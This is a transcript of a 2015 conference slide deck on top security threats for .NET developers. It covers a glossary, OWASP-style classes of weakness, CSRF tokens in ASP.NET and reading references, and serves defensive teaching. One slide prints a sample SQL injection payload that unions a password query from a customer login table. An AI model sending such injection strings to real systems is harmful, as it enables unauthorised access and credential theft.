Post on 06-Aug-2015
transcript
Top Security Threats for .NET developers
Mikhail ShcherbakovProduct Manager at Cezurity
10-я конференция .NET разработчиков19 апреля 2015dotnetconf.ru
About me
Product Manager at Cezurity One of the core developers of the source
code analyzer PT Application Inspector Former Team Lead at Acronis, Luxoft,
Boeing, SPC KRUG
Security DevelopmentWhere to Begin?
Security Development
Security Development
How to write code?
Glossary
Glossary
Threat - a potential violation of security (ISO 7498-2).
Impact - consequences for an organization or environment when an attack is realized, or weakness is present.
Attack - a well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation.
Glossary
Weakness - a type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software.
Vulnerability - an occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.
Glossary
Need to Deal with Weaknesses!
Classifications
Classifications
https://www.owasp.org/index.php/Category:Attack
Classifications
https://www.owasp.org/index.php/Category:Vulnerability
Classifications
http://projects.webappsec.org/w/page/13246978/Threat%20Classification
Classifications
Create a classification for developers!
Improper Input/Output Handling Implementation
Improper Input/Output Handling SQL Injection OS Commanding XML Injection XPath Injection XQuery Injection LDAP Injection Cross-site scripting
(XSS)
Unrestricted File Upload
Path Traversal HTTP Response
Splitting Content Spoofing Buffer Overflow
Injection Anatomy
Input Data
’ OR 1=1 --‘ union all select password FROM CustomerLogin WHERE email = ‘x@exapmle.com'--
Injection Anatomy
SQL Injection with EF
Show me code!
Cross-site scripting (XSS)
Reflected Stored DOM-based
Stored XSS
Show me code!
DOM-based XSS
Show me code!
Insufficient Control Flow ManagementDesign/Implementation
Insufficient Control Flow Management Cross-Site Request Forgery (CSRF) Mass Assignment Business Logic Errors Abuse of Functionality
CSRF
CSRF
ASP.NET MVC <%= Html.AntiForgeryToken() %>
<input name="__RequestVerificationToken" type="hidden“ …
ASP.NET Web Forms __VIEWSTATE, __EVENTVALIDATION
http://www.jardinesoftware.com/Documents/ASP_Net_Web_Forms_CSRF_Workflow.pdf
Business Logic Error
Samples
Sensitive Data ExposureDesign/Implementation/Deployment
Sensitive Data Exposure
Insufficient Transport Layer Protection Insecure Cryptographic Storage Insufficient Client-side Data Protection
Improper Access ControlDesign/Implementation/Deployment
Improper Access Control
Insufficient Authentication Insufficient Authorization Insufficient Password Recovery Insufficient Session Expiration Credential/Session Prediction Improper File System Permissions Brute Force Insufficient Anti-automation
Secure MisconfigurationDeployment
Secure Misconfiguration
Application Misconfiguration Server Misconfiguration Information Exposure Through an Error
Message Information Leakage Directory Indexing Insecure Indexing Using Components with Known
Vulnerabilities
Summary
OWASP Top Ten Project (2010/2013) http://bit.ly/1OffewO
OWASP .NET Project http://bit.ly/1cz62Sv Vladimir Kochetkov Blog
http://bit.ly/1DecXWI Troy Hunt Blog www.troyhunt.com OWASP Developer Guide
http://bit.ly/1JcQLoh CWE/SANS Top 25 Most Dangerous
Software Errors (2011) http://bit.ly/1bjDTOH
Thank you for your attention!
Mikhail Shcherbakov
ms@cezurity.com
linkedin.com/in/mikhailshcherbakov
github.com/yuske
@yu5k3
Product Manager at Cezurity